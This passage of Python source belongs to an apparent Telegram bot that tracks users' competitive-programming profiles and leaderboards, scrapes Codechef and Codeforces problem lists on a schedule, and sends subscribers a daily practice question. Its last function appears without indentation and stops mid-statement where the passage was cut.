    # Job ids are "<chat_id><contest_id><0|1>"; use parameterized LIKE
    # patterns instead of string-built SQL, and query only once.
    c.execute("SELECT id FROM apscheduler_jobs WHERE id LIKE ? AND id LIKE ?",
              (cid + "%", "%0"))
    jobs = c.fetchall()
    if jobs:
        keyboard = []
        for rec in jobs:
            # Strip the tuple-repr wrapping to recover the bare job id.
            s = str(rec).replace("('", "").replace("',)", "").replace('("', "").replace('",)', "")
            # First line of the job's message arg is the contest title.
            keyboard.append([InlineKeyboardButton(
                str(schedule.get_job(job_id=s).args[1].split("\n")[0]),
                callback_data=s[:-1] + "notiplz")])
        reply_markup = InlineKeyboardMarkup(keyboard)
        update.message.reply_text("Here are your pending reminders\nSelect the reminder you want to remove", reply_markup=reply_markup)
        c.close()
        conn.close()  # BUG FIX: the connection was previously left open
        return REMNOTI
    else:
        c.close()
        conn.close()
        update.message.reply_text("You have no pending reminders")
        return ConversationHandler.END
def remnoti(bot, update):
    """Callback handler: drop both scheduled jobs for the chosen reminder."""
    query = update.callback_query
    job_prefix = str(query.data).replace("notiplz", "")
    # Each reminder has two jobs: "<prefix>0" (day-of) and "<prefix>1" (30 min before).
    for suffix in ("0", "1"):
        schedule.remove_job(job_prefix + suffix)
    bot.edit_message_text(text="Reminder removed", message_id=query.message.message_id,
                          chat_id=query.message.chat_id)
    return ConversationHandler.END
# END OF CONVERSATION HANDLER TO REMOVE REMINDERS
# START OF CONVERSATION HANDLER FOR UNREGISTERING
@timeouts.wrapper
def unregister(bot, update):
    """Show the judge-selection keyboard that starts the unregister flow."""
    judges = (("Hackerearth", 'HErem2'), ("Hackerrank", 'HRrem2'),
              ("Codechef", 'CCrem2'), ("Spoj", 'SPrem2'),
              ("Codeforces", 'CFrem2'), ("ALL", 'ALLrem2'))
    buttons = [InlineKeyboardButton(label, callback_data=data) for label, data in judges]
    # Two buttons per keyboard row, preserving the order above.
    keyboard = [buttons[k:k + 2] for k in range(0, len(buttons), 2)]
    update.message.reply_text("Select the judge you want to unregister from",
                              reply_markup=InlineKeyboardMarkup(keyboard))
    return REMOVER
# FUNCTION FOR REMOVING DATA FROM DATABASE ACCORDING TO USERS CHOICE
# Shared SQL template for the per-judge leaderboards. The column name is
# whitelisted in remover() before substitution — never user-controlled.
_PRIORITY_SQL = ("SELECT datas.name, datas.{0} FROM datas INNER JOIN priority "
                 "ON datas.id=priority.id ORDER BY CAST(priority.{0} AS FLOAT) DESC")
_ALL_SQL = ("SELECT datas.name, datas.HE, datas.HR, datas.SP, datas.CF, datas.CC FROM datas "
            "INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.CF AS FLOAT) DESC, "
            "CAST(priority.CC AS FLOAT) DESC, CAST(priority.HR AS FLOAT) DESC, CAST(priority.HE AS FLOAT) DESC")


def _rebuild_xlsx(cursor, sql, path):
    """Re-export the rows of *sql* to *path* as a formatted xlsx sheet."""
    workbook = Workbook(path)
    worksheet = workbook.add_worksheet()
    cell_fmt = workbook.add_format()  # renamed: `format` shadowed the builtin
    cell_fmt.set_align('top')
    cell_fmt.set_text_wrap()
    for i, row in enumerate(cursor.execute(sql)):
        for j in range(len(row)):
            worksheet.write(i, j, row[j], cell_fmt)
        worksheet.set_row(i, 170)
    worksheet.set_column(0, 5, 40)
    workbook.close()


def remover(bot, update):
    """Callback handler: unregister the user from one judge, or from all.

    Clears the user's columns (or whole rows for "ALL") in the datas,
    handles and priority tables, then regenerates the affected leaderboard
    xlsx files. Deletes the user entirely once every handle is empty.
    """
    query = update.callback_query
    val = str(query.data).replace("rem2", "")
    # Whitelist before `val` is ever interpolated into SQL.
    if val not in ("HE", "HR", "CC", "SP", "CF", "ALL"):
        return ConversationHandler.END
    conn = sqlite3.connect(mount_point+'coders1.db')
    c = conn.cursor()
    a = str(query.from_user.id)
    c.execute("SELECT id FROM handles WHERE id=(?)", (a,))
    if not c.fetchone():
        bot.edit_message_text(text='You are not registered to the bot. Please register using /register command',
                              chat_id=query.message.chat_id,
                              message_id=query.message.message_id)
        conn.close()
        return ConversationHandler.END
    if val == "ALL":
        # Remove the user's entire row from every table.
        c.execute("DELETE FROM datas WHERE id = (?)", (a,))
        c.execute("DELETE FROM handles WHERE id = (?)", (a,))
        c.execute("DELETE FROM priority WHERE id = (?)", (a,))
        conn.commit()
        bot.edit_message_text(text='Unregistering please wait',
                              chat_id=query.message.chat_id,
                              message_id=query.message.message_id)
        for col in ("HE", "HR", "CF", "CC"):
            _rebuild_xlsx(c, _PRIORITY_SQL.format(col), mount_point + col + ".xlsx")
        _rebuild_xlsx(c, "SELECT name, SP FROM datas", mount_point + "SP.xlsx")
    else:
        c.execute("SELECT " + val + " FROM handles WHERE id=(?)", (a,))
        row = c.fetchone()
        if row is None or row[0] is None or row[0] == "":
            bot.edit_message_text(text='You are not registered to the bot. Please register using /register command',
                                  chat_id=query.message.chat_id,
                                  message_id=query.message.message_id)
            conn.close()
            return ConversationHandler.END
        # Clear only this judge's entry.
        c.execute("UPDATE datas SET " + val + " = (?) WHERE id = (?) ", ("", a))
        c.execute("UPDATE handles SET " + val + " = (?) WHERE id = (?) ", ("", a))
        if not val == 'SP':
            # This code never writes a priority.SP column — see the guard here
            # and the ALL branch above; presumably spoj has no rating to rank by.
            c.execute("UPDATE priority SET " + val + " = (?) WHERE id = (?) ", ("", a))
        conn.commit()
        bot.edit_message_text(text='Unregistering please wait',
                              chat_id=query.message.chat_id,
                              message_id=query.message.message_id)
        # BUG FIX: the old code ranked by priority.<col> even for SP, although
        # the priority table is never given an SP value (guard above).
        if val == 'SP':
            _rebuild_xlsx(c, "SELECT name, SP FROM datas", mount_point + "SP.xlsx")
        else:
            _rebuild_xlsx(c, _PRIORITY_SQL.format(val), mount_point + val + ".xlsx")
        # If every handle is now empty, drop the user completely.
        c.execute("SELECT HE, HR, SP, CF, CC FROM handles WHERE id =(?)", (a,))
        handles = c.fetchone()
        if handles is not None and all(h is None or h == "" for h in handles):
            c.execute("DELETE FROM datas WHERE id = (?)", (a,))
            c.execute("DELETE FROM handles WHERE id = (?)", (a,))
            c.execute("DELETE FROM priority WHERE id = (?)", (a,))
            conn.commit()
    # BUG FIX: all.xlsx was previously regenerated only on the single-judge
    # path, leaving it stale after a full ("ALL") unregister.
    _rebuild_xlsx(c, _ALL_SQL, mount_point + 'all.xlsx')
    bot.send_message(chat_id=query.message.chat_id, text="Successfully unregistered")
    conn.commit()
    conn.close()
    return ConversationHandler.END
# END OF CONVERSATION HANDLER FOR UNREGISTERING
# Separate in-memory scheduler for the periodic scraping/update jobs below
# (reminders use the persistent `schedule` scheduler instead).
sched = BackgroundScheduler()
# FUNCTION FOR UPDATING ALL THE QUESTIONS FROM CODECHEF
# SCHEDULED TO AUTOMATICALLY HAPPEN AT 18:30 GMT WHICH IS 0:0 IST
# Browser-like User-Agent used for every codechef problem-list request.
_CC_UA = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"}


def _cc_fetch(difficulty):
    """Fetch one codechef problem-list page.

    Returns ``(request, connection, soup, names, links)`` where *names* are
    the problem-name divs and *links* the submit anchors. May raise
    urllib.error.URLError; the caller handles it.
    """
    req = urllib.request.Request("https://www.codechef.com/problems/" + difficulty + "/", headers=_CC_UA)
    con = urllib.request.urlopen(req)
    soup = bs.BeautifulSoup(con, "html5lib")
    names = soup.find_all('div', {"class": "problemname"})
    links = soup.find_all('a', {"title": "Submit a solution to this problem."})
    return req, con, soup, names, links


@sched.scheduled_job('cron', day_of_week='sat-sun', hour=18, minute=30)
def qupd():
    """Weekend job (18:30 GMT == 00:00 IST): refresh the cached codechef
    problem lists for every difficulty, then notify the admins.

    The five previously copy-pasted request/parse stanzas are replaced by
    one helper; the module-level globals consumed by sender() are kept.
    """
    global reqccc, reqcce, reqcch, reqccm, reqccs, conccc, concce, concch, conccm, conccs, scce, s1cce, scch, s1cch, sccm, s1ccm, sccs, s1ccs, sccc, s1ccc, soupccc, soupcce, soupcch, soupccm, soupccs
    try:
        reqcce, concce, soupcce, scce, s1cce = _cc_fetch("easy")
        reqccs, conccs, soupccs, sccs, s1ccs = _cc_fetch("school")
        reqccm, conccm, soupccm, sccm, s1ccm = _cc_fetch("medium")
        reqcch, concch, soupcch, scch, s1cch = _cc_fetch("hard")
        reqccc, conccc, soupccc, sccc, s1ccc = _cc_fetch("challenge")
        bot = Bot(TOKEN)
        for chatids in adminlist:
            bot.send_message(chat_id=chatids, text="Questions updated codechef")
    except urllib.error.URLError:
        # Best effort: keep the previous lists when codechef is unreachable.
        pass
# FUNCTION FOR UPDATING ALL THE QUESTIONS FROM CODEFORCES
# SCHEDULED TO AUTOMATICALLY HAPPEN AT 18:30 GMT WHICH IS 0:0 IST
@sched.scheduled_job('cron', day_of_week='sat-sun', hour=18, minute=30)
def updateCf():
    """Weekend job: crawl newly-added codeforces problems into
    codeforces.json (bucketed by problem letter) and reload ``qcf``.

    Crawls problemset pages newest-first and stops as soon as the previously
    recorded latest problem id is seen again.
    """
    global qcf
    bot = Bot(TOKEN)
    opener = urllib.request.build_opener()
    opener.addheaders = [('User-agent', 'Mozilla/5.0')]
    source1 = opener.open("http://www.codeforces.com/problemset")
    soup1 = bs.BeautifulSoup(source1, 'html5lib')
    endpage = int(soup1.findAll('span', {"class": "page-index"})[-1].getText())
    latest = soup1.find('td', {"class": "id"}).text
    with open(mount_point+'codeforces.json', 'r') as codeforces:
        data = json.load(codeforces)
    latest1 = data['latest']
    if latest1 == latest:
        return  # nothing new since the last crawl
    data['latest'] = latest
    signal = True
    for i in range(1, endpage + 1):
        if not signal:
            # Hit the previously-known latest problem: crawl is complete.
            for chatids in adminlist:
                bot.send_message(chat_id=chatids, text="Codeforces questions up to date")
            break
        source = opener.open("http://www.codeforces.com/problemset/page/" + str(i))
        soup = bs.BeautifulSoup(source, 'html5lib')
        for s1 in soup.findAll('td', {"class": "id"}):
            if s1.text == latest1:
                signal = False
                break
            save = "http://www.codeforces.com" + s1.find('a').get('href')
            # Bucket by the first problem letter found in the URL;
            # anything else lands in OTHERS (same rule as before).
            for letter in ('A', 'B', 'C', 'D', 'E', 'F'):
                if letter in save:
                    data[letter].append(save)
                    break
            else:
                data['OTHERS'].append(save)
    # Rewrite the cache in place (open('w') truncates; the previous
    # os.remove() was redundant), then reload the in-memory copy.
    with open(mount_point+'codeforces.json', 'w') as codeforces:
        json.dump(data, codeforces)
    with open(mount_point+'codeforces.json', 'r') as codeforces:
        qcf = json.load(codeforces)
    for chatids in adminlist:
        bot.send_message(chat_id=chatids, text="Questions updated codeforces")
# FUNCTION FOR UPDATING ALL THE DETAILS IN DATAS TABLE
# SCHEDULED TO AUTOMATICALLY HAPPEN AT 18:30 GMT WHICH IS 0:0 IST
def _write_sheet(cursor, sql, path):
    """Export the rows of *sql* to *path* as a formatted xlsx leaderboard."""
    workbook = Workbook(path)
    worksheet = workbook.add_worksheet()
    cell_fmt = workbook.add_format()  # renamed: `format` shadowed the builtin
    cell_fmt.set_align('top')
    cell_fmt.set_text_wrap()
    for i, row in enumerate(cursor.execute(sql)):
        for j in range(len(row)):
            worksheet.write(i, j, row[j], cell_fmt)
        worksheet.set_row(i, 170)
    worksheet.set_column(0, 5, 40)
    workbook.close()


def _ua_opener():
    """Build a urllib opener with a browser-like User-Agent."""
    opener = urllib.request.build_opener()
    opener.addheaders = [('User-agent', 'Mozilla/5.0')]
    return opener


def _scrape_he(handle):
    """Scrape a hackerearth profile; return its summary text or '' on failure."""
    try:
        sauce = _ua_opener().open('https://www.hackerearth.com/@' + str(handle))
        soup = bs.BeautifulSoup(sauce, 'html5lib')
        stri = "HACKEREARTH\n"
        for i in soup.find_all('a', {
                "href": "/users/" + str(handle) + "/activity/hackerearth/#user-rating-graph"}):
            stri = stri + i.text + "\n"
        for i in soup.find_all('a', {"href": "/@" + str(handle) + "/followers/"}):
            stri = stri + i.text + "\n"
        for i in soup.find_all('a', {"href": "/@" + str(handle) + "/following/"}):
            stri = stri + i.text + "\n"
        return stri
    except urllib.error.URLError:
        return ""


def _scrape_hr(handle):
    """Scrape a hackerrank profile; return its summary text or '' on failure."""
    try:
        sauce = _ua_opener().open('https://www.hackerrank.com/' + str(handle) + '?hr_r=1')
        soup = bs.BeautifulSoup(sauce, 'html5lib')
        try:
            s = soup.find('script', {"id": "initialData"}).text
            # The profile JSON is embedded in the page: slice 280 chars after
            # the third "hacker_id" occurrence and crudely de-structure it.
            i = s.find("hacker_id", s.find("hacker_id", s.find("hacker_id") + 1) + 1)
            fields = parse.unquote(s[i:i + 280]).replace(",", ">").replace(":", " ").replace(
                "{", "").replace("}", "").replace('"', "").split(">")
            s1 = "HACKERRANK\n"
            for j in range(1, 10):
                s1 = s1 + fields[j] + "\n"
            return s1
        except AttributeError:
            return ""
    except urllib.error.URLError:
        return ""


def _scrape_cc(handle):
    """Scrape a codechef profile (up to 5 retries on network errors)."""
    opener = _ua_opener()
    for _ in range(5):
        try:
            sauce = opener.open('https://www.codechef.com/users/' + str(handle))
            soup = bs.BeautifulSoup(sauce, 'html5lib')
            try:
                rank = soup.find('a', {"href": "http://www.codechef.com/ratings/all"}).text
                try:
                    s1 = soup.find('span', {"class": "rating"}).text + "\n"
                except AttributeError:
                    s1 = ""
                return ("CODECHEF" + "\n" + s1 + "rating: " + rank + "\n" + soup.find('div', {
                    "class": "rating-ranks"}).text.replace(" ", "").replace("\n\n", "").strip('\n'))
            except AttributeError:
                return ""
        except urllib.error.URLError:
            continue
    return ""


def _scrape_sp(handle):
    """Scrape a spoj profile; return its summary text or '' on failure."""
    try:
        sauce = _ua_opener().open('http://www.spoj.com/users/' + str(handle) + '/')
        soup = bs.BeautifulSoup(sauce, 'html5lib')
        try:
            s = soup.find('div', {"class": "col-md-3"}).text.strip('\n\n').replace("\t", "").split('\n')
            s = s[3].strip().split(":")
            return ("SPOJ\n" + s[0] + "\n" + s[1].strip(" ") + "\n" + soup.find('dl', {
                "class": "dl-horizontal profile-info-data profile-info-data-stats"}).text.replace(
                "\t", "").replace("\xa0", "").strip('\n'))
        except AttributeError:
            return ""
    except urllib.error.URLError:
        return ""


def _scrape_cf(handle):
    """Scrape a codeforces profile; return its summary text or '' on failure."""
    try:
        sauce = _ua_opener().open('http://codeforces.com/profile/' + str(handle))
        soup = bs.BeautifulSoup(sauce, 'html5lib')
        try:
            contrib = soup.find('img', {"alt": "User\'\'s contribution into Codeforces community"})
            spans = soup.find_all('span', {"style": "font-weight:bold;"})
            if len(spans) == 0:
                s2 = ""
            else:
                s2 = "contest rating: " + spans[0].text + "\n" + "max: " + spans[1].text + spans[2].text + "\n"
            # AttributeError here (contrib is None) means "no such profile".
            return "CODEFORCES\n" + s2 + "contributions: " + contrib.nextSibling.nextSibling.text
        except AttributeError:
            return ""
    except urllib.error.URLError:
        return ""


@sched.scheduled_job('cron', hour=18, minute=30)
def updaters():
    """Nightly job (18:30 GMT == 00:00 IST): re-scrape every registered
    user's profiles, refresh the datas/priority tables and regenerate all
    leaderboard xlsx files.

    A scrape returning '' (site down / profile gone) keeps the stored data
    unless the handle itself is empty, so transient failures don't wipe rows.
    """
    global timeouts
    timeouts = Spam_settings()  # reset the daily rate limiter
    conn = sqlite3.connect(mount_point+'coders1.db')
    c = conn.cursor()
    c.execute('SELECT id, HE, HR, CC, SP, CF FROM handles')
    for row in c.fetchall():
        a = row[0]
        he = _scrape_he(row[1]) if (row[1] != '' and row[1] is not None) else ""
        hr = _scrape_hr(row[2]) if (row[2] != '' and row[2] is not None) else ""
        cc = _scrape_cc(row[3]) if (row[3] != '' and row[3] is not None) else ""
        sp = _scrape_sp(row[4]) if (row[4] != '' and row[4] is not None) else ""
        cf = _scrape_cf(row[5]) if (row[5] != '' and row[5] is not None) else ""
        if not he == '' or (he == '' and (row[1] == '' or row[1] is None)):
            c.execute("UPDATE datas SET HE=(?) WHERE id=(?)", (he, str(a)))
            try:
                rat = he.split('\n')
                if rat[1] == "Rating":
                    rat2 = rat[2].strip(" ").strip("\n")
                    c.execute("UPDATE priority SET HE = (?) WHERE id = (?) ", (rat2, str(a)))
            except Exception:
                pass  # rating line missing: leave the old priority value
        if not hr == '' or (hr == '' and (row[2] == '' or row[2] is None)):
            c.execute("UPDATE datas SET HR=(?) WHERE id=(?)", (hr, str(a)))
            try:
                rat = hr.split('\n')
                rat2 = rat[1].split(" ")[1].strip(" ").strip("\n")
                c.execute("UPDATE priority SET HR = (?) WHERE id = (?) ", (rat2, str(a)))
            except Exception:
                pass
        if not cf == '' or (cf == '' and (row[5] == '' or row[5] is None)):
            c.execute("UPDATE datas SET CF=(?) WHERE id=(?)", (cf, str(a)))
            try:
                rat = cf.split("\n")
                if "contest rating:" in rat[1]:
                    rat2 = rat[1].split(" ")[2].strip(" ").strip("\n")
                    c.execute("UPDATE priority SET CF = (?) WHERE id = (?) ", (rat2, str(a)))
            except Exception:
                pass
        if not cc == '' or (cc == '' and (row[3] == '' or row[3] is None)):
            c.execute("UPDATE datas SET CC=(?) WHERE id=(?)", (cc, str(a)))
            try:
                rat = cc.split("\n")
                if not "rating" in rat[1]:
                    rat2 = rat[2].split(" ")[1].strip(" ").strip("\n")
                    c.execute("UPDATE priority SET CC = (?) WHERE id = (?) ", (rat2, str(a)))
            except Exception:
                pass
        if not sp == '' or (sp == '' and (row[4] == '' or row[4] is None)):
            c.execute("UPDATE datas SET SP=(?) WHERE id=(?)", (sp, str(a)))
    # Regenerate every leaderboard workbook from the fresh data.
    for col in ("HE", "HR", "CF", "CC"):
        _write_sheet(c, "SELECT datas.name, datas." + col + " FROM datas INNER JOIN priority "
                     "ON datas.id=priority.id ORDER BY CAST(priority." + col + " AS FLOAT) DESC",
                     mount_point + col + ".xlsx")
    _write_sheet(c, "SELECT name, SP FROM datas", mount_point + "SP.xlsx")
    _write_sheet(c, "SELECT datas.name, datas.HE, datas.HR, datas.SP, datas.CF, datas.CC FROM datas "
                 "INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.CF AS FLOAT) DESC, "
                 "CAST(priority.CC AS FLOAT) DESC, CAST(priority.HR AS FLOAT) DESC, CAST(priority.HE AS FLOAT) DESC",
                 mount_point + 'all.xlsx')
    conn.commit()
    conn.close()
    bot = Bot(TOKEN)
    for chatids in adminlist:
        bot.send_message(chat_id=chatids, text="Data updated")
# START OF CONVERSATION HANDLER TO SUBSCRIBE TO QUESTION OF THE DAY
@timeouts.wrapper
def subscribe(bot,update):
    """Entry point of the question-of-the-day subscription conversation."""
    chat_id = update.message.chat_id
    if chat_id < 0:
        # Negative chat ids are groups: warn where the questions will land.
        update.message.reply_text("I detected this is a group\nIf you subscribe here I will send questions to the group\nTo get questions to yourself subscribe to me in personal message")
    markup = InlineKeyboardMarkup([[InlineKeyboardButton("CODEFORCES", callback_data='CFsub3'),
                                    InlineKeyboardButton("CODECHEF", callback_data='CCsub3')]])
    bot.send_message(text="Please select the website to which you wish to subscribe for getting question of the day",chat_id=chat_id,reply_markup=markup)
    return SUBSEL
def subsel(bot,update):
    """Second subscription step: show difficulty (codechef) or problem-index
    (codeforces) choices for the site picked in subscribe()."""
    query = update.callback_query
    choice = query.data
    if choice == 'CCsub3':
        rows = [["Beginner", "Easy"], ["Medium", "Hard"], ["Challenge"]]
        keyboard = [[InlineKeyboardButton(label, callback_data=label.upper() + 'cc2')
                     for label in row] for row in rows]
        bot.edit_message_text(chat_id=query.message.chat_id, message_id=query.message.message_id,
                              text="Please select", reply_markup=InlineKeyboardMarkup(keyboard))
        return SUBCC
    elif choice == 'CFsub3':
        rows = [["A", "B", "C"], ["D", "E", "F"], ["OTHERS"]]
        keyboard = [[InlineKeyboardButton(label, callback_data=label + 'cf2')
                     for label in row] for row in rows]
        bot.edit_message_text(chat_id=query.message.chat_id, message_id=query.message.message_id,
                              text="Please select", reply_markup=InlineKeyboardMarkup(keyboard))
        return SUBCF
def subcc(bot,update):
    """Record a codechef question-of-the-day subscription for this chat."""
    query = update.callback_query
    difficulty = str(query.data).replace("cc2", "")
    chat = str(query.message.chat_id)
    conn = sqlite3.connect(mount_point+'coders1.db')
    cur = conn.cursor()
    # Insert a fresh row, or update the existing one when the chat is known.
    cur.execute("INSERT OR IGNORE INTO subscribers (id,CC,CCSEL) VALUES (?, ?, ?)", (chat, 1, difficulty))
    if cur.rowcount == 0:
        cur.execute("UPDATE subscribers SET CC = (?) , CCSEL= (?) WHERE id = (?) ", (1, difficulty, chat))
    conn.commit()
    conn.close()
    bot.edit_message_text(chat_id=query.message.chat_id, message_id=query.message.message_id, text="I will send you a question of type "+difficulty+" everyday from codechef \nyou can use command /unsubscribe to unsubscribe ")
    return ConversationHandler.END
def subcf(bot,update):
    """Record a codeforces question-of-the-day subscription for this chat."""
    query = update.callback_query
    letter = str(query.data).replace("cf2", "")
    chat = str(query.message.chat_id)
    conn = sqlite3.connect(mount_point+'coders1.db')
    cur = conn.cursor()
    # Insert a fresh row, or update the existing one when the chat is known.
    cur.execute("INSERT OR IGNORE INTO subscribers (id,CF,CFSEL) VALUES (?, ?, ?)", (chat, 1, letter))
    if cur.rowcount == 0:
        cur.execute("UPDATE subscribers SET CF = (?) , CFSEL= (?) WHERE id = (?) ", (1, letter, chat))
    conn.commit()
    conn.close()
    bot.edit_message_text(chat_id=query.message.chat_id, message_id=query.message.message_id, text="I will send you a question of type "+letter+" everyday from codeforces \nyou can use command /unsubscribe to unsubscribe ")
    return ConversationHandler.END
# END OF CONVERSATION HANDLER TO SUBSCRIBE TO QUESTION OF THE DAY
# START OF CONVERSATION HANDLER TO UNSUBSCRIBE FROM QUESTION OF THE DAY
@timeouts.wrapper
def unsubsel(bot,update):
    """Entry point of the unsubscribe conversation: list this chat's active
    question-of-the-day subscriptions as an inline keyboard."""
    conn = sqlite3.connect(mount_point+'coders1.db')
    c = conn.cursor()
    chat = str(update.message.chat_id)
    c.execute("SELECT id FROM subscribers WHERE id=(?)", (chat,))
    if not c.fetchone():
        update.message.reply_text("You have not subscribed for question of the day")
        c.close()
        conn.close()  # BUG FIX: the connection leaked on this path before
        return ConversationHandler.END
    c.execute("SELECT CC,CF FROM subscribers WHERE id=(?)", (chat,))
    keyboard = []
    for row in c.fetchall():
        if row[0] == 1:
            keyboard.append([InlineKeyboardButton("CODECHEF", callback_data='CCunsub4')])
        if row[1] == 1:
            keyboard.append([InlineKeyboardButton("CODEFORCES", callback_data='CFunsub4')])
    reply_markup = InlineKeyboardMarkup(keyboard)
    update.message.reply_text("Select the one you want to unsubscribe from", reply_markup=reply_markup)
    c.close()
    conn.close()
    return UNSUB
def unsub(bot,update):
    """Clear the chosen subscription; drop the row entirely if none remain."""
    query = update.callback_query
    val = str(query.data).replace("unsub4", "")
    # Whitelist the column name before interpolating it into SQL.
    if val not in ("CC", "CF"):
        return ConversationHandler.END
    a = str(query.message.chat_id)
    conn = sqlite3.connect(mount_point+'coders1.db')
    c = conn.cursor()
    c.execute("UPDATE subscribers SET " + val + " = 0 WHERE id = (?) ", (a,))
    conn.commit()
    c.execute("SELECT CC,CF FROM subscribers WHERE id=(?)", (a,))
    row = c.fetchone()
    if row is not None and row[0] == 0 and row[1] == 0:
        # Both subscriptions gone: remove the subscriber record.
        c.execute("DELETE FROM subscribers WHERE id=(?)", (a,))
        conn.commit()
    bot.edit_message_text(chat_id=query.message.chat_id, message_id=query.message.message_id, text="unsubscribed")
    c.close()
    conn.close()
    return ConversationHandler.END
# END OF CONVERSATION HANDLER TO UNSUBSCRIBE FROM QUESTION OF THE DAY
# FUNCTION TO SEND QUESTION TO COMPETITIVE CODERS EVERY DAY
@sched.scheduled_job('cron', hour=0, minute=0)
def sender():
    """Daily midnight job: send each subscriber one random question from the
    judge(s) they subscribed to.

    Subscriber row layout (as read here): [0]=chat id, [1]=CC flag,
    [2]=CF flag, [3]=CC difficulty, [4]=CF problem letter.
    """
    bot = Bot(TOKEN)
    global scce, s1cce, scch, s1cch, sccm, s1ccm, sccs, s1ccs, sccc, s1ccc,qcf
    conn = sqlite3.connect(mount_point+'coders1.db')
    c = conn.cursor()
    # Map each codechef difficulty to its cached (problem names, links) lists
    # maintained by qupd().
    cc_pools = {'BEGINNER': (sccs, s1ccs), 'EASY': (scce, s1cce),
                'MEDIUM': (sccm, s1ccm), 'HARD': (scch, s1cch),
                'CHALLENGE': (sccc, s1ccc)}
    c.execute("SELECT * FROM subscribers")
    for row in c.fetchall():
        if row[1] == 1:
            val = row[3]
            pool = cc_pools.get(val)
            # BUG FIX: an unrecognised difficulty used to leave strt/strn
            # unbound and crash the whole job with UnboundLocalError.
            if pool is not None:
                names, links = pool
                n = random.randint(0, len(names) - 1)
                strt = names[n].text.strip("\n\n ")
                strn = links[n].text
                bot.send_message(
                    text="Random " + val + " question from codechef\n\n" + strt + "\n" + "https://www.codechef.com/problems/" + strn,
                    chat_id=row[0])
        if row[2] == 1:
            val = row[4]
            # Unknown letters fall back to the OTHERS bucket, as before.
            bucket = qcf[val] if val in ('A', 'B', 'C', 'D', 'E', 'F') else qcf['OTHERS']
            strn = bucket[random.randint(0, len(bucket) - 1)]
            bot.send_message(
                text="Random " + val + " question from codeforces\n\n" + strn,
                chat_id=row[0])
    c.close()
    conn.close()
# Start the scraping/question-of-the-day scheduler now that all of its
# jobs have been registered above.
sched.start()
# START OF CONVERSATION HANDLER FOR UPDATING USERS DATA ON HIS WISH
@timeouts.wrapper
def updatesel(bot, update):
keyboard = [[InlineKeyboardButton("Hackerearth", callback_data='HEupd5'),
InlineKeyboardButton("Hackerrank", callback_data='HRupd5')],
[InlineKeyboardButton("Codechef", callback_data='CCupd5'),
InlineKeyboardButton("Spoj", callback_data='SPupd5')],
[InlineKeyboardButton("Codeforces", callback_data='CFupd5'),
InlineKeyboardButton("ALL", callback_data='ALLupd5')]]
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text("PLEASE SELECT THE JUDGE FROM WHICH YOU WANT TO UPDATE YOUR PROFILE",
reply_markup=reply_markup)
return UPDA
# FUNCTION TO UPDATE PARTICULR ENTRY USER SELECTED
def updasel(bot, update):
query = update.callback_query
val = query.data
val=str(val).replace("upd5","")
a = str(query.from_user.id)
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
c.execute("SELECT id FROM handles WHERE id=(?)", (a,))
if not c.fetchone():
bot.edit_message_text(text='You are not registered to the bot. Please register using /register command',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
conn.close()
return ConversationHandler.END
if val == "ALL":
# IF USER SELECTED ALL UPDATING ALL HIS VALUES
c.execute('SELECT id, HE, HR, CC, SP, CF FROM handles WHERE id=(?)', (a,))
for row in c.fetchall():
a = ""
he = ""
hr = ""
sp = ""
cc = ""
cf = ""
for wo in range(0, 6):
if wo == 0:
if row[wo] is None:
bot.edit_message_text(text='You are not registered to the bot',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
conn.close()
return ConversationHandler.END
a = row[wo]
elif wo == 1 and (row[wo] != '' and row[wo] is not None):
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('https://www.hackerearth.com/@' + str(row[wo]))
soup = bs.BeautifulSoup(sauce, 'html5lib')
stri = "HACKEREARTH\n"
for i in soup.find_all('a', {
"href": "/users/" + str(row[wo]) + "/activity/hackerearth/#user-rating-graph"}):
stri = stri + i.text + "\n"
for i in soup.find_all('a', {"href": "/@" + str(row[wo]) + "/followers/"}):
stri = stri + i.text + "\n"
for i in soup.find_all('a', {"href": "/@" + str(row[wo]) + "/following/"}):
stri = stri + i.text + "\n"
he = stri
except urllib.error.URLError as e:
pass
elif wo == 2 and (row[wo] != '' and row[wo] is not None):
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('https://www.hackerrank.com/' + str(row[wo]) + '?hr_r=1')
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('script', {"id": "initialData"}).text
s = soup.find('script', {"id": "initialData"}).text
i = s.find("hacker_id", s.find("hacker_id", s.find("hacker_id") + 1) + 1)
i = parse.unquote(s[i:i + 280]).replace(",", ">").replace(":", " ").replace("{",
"").replace(
"}",
"").replace(
'"', "").split(">")
s1 = "HACKERRANK\n"
for j in range(1, 10):
s1 = s1 + i[j] + "\n"
hr = s1
except AttributeError:
pass
except urllib.error.URLError as e:
pass
elif wo == 3 and (row[wo] != '' and row[wo] is not None):
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
count=0
while(count<5):
try:
sauce = opener.open('https://www.codechef.com/users/' + str(row[wo]))
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('a', {"href": "http://www.codechef.com/ratings/all"}).text
try:
s1 = soup.find('span', {"class": "rating"}).text + "\n"
except AttributeError:
s1 = ""
s = "CODECHEF" + "\n" + s1 + "rating: " + soup.find('a', {
"href": "http://www.codechef.com/ratings/all"}).text + "\n" + soup.find('div', {
"class": "rating-ranks"}).text.replace(" ", "").replace("\n\n", "").strip('\n')
cc = s
break
except AttributeError:
break
except urllib.error.URLError as e:
count=count+1
continue
elif wo == 4 and (row[wo] != '' and row[wo] is not None):
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('http://www.spoj.com/users/' + str(row[wo]) + '/')
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('div', {"class": "col-md-3"}).text
s = soup.find('div', {"class": "col-md-3"}).text.strip('\n\n').replace("\t", "").split('\n')
s = s[3].strip().split(":")
s = "SPOJ\n" + s[0] + "\n" + s[1].strip(" ") + "\n" + soup.find('dl', {
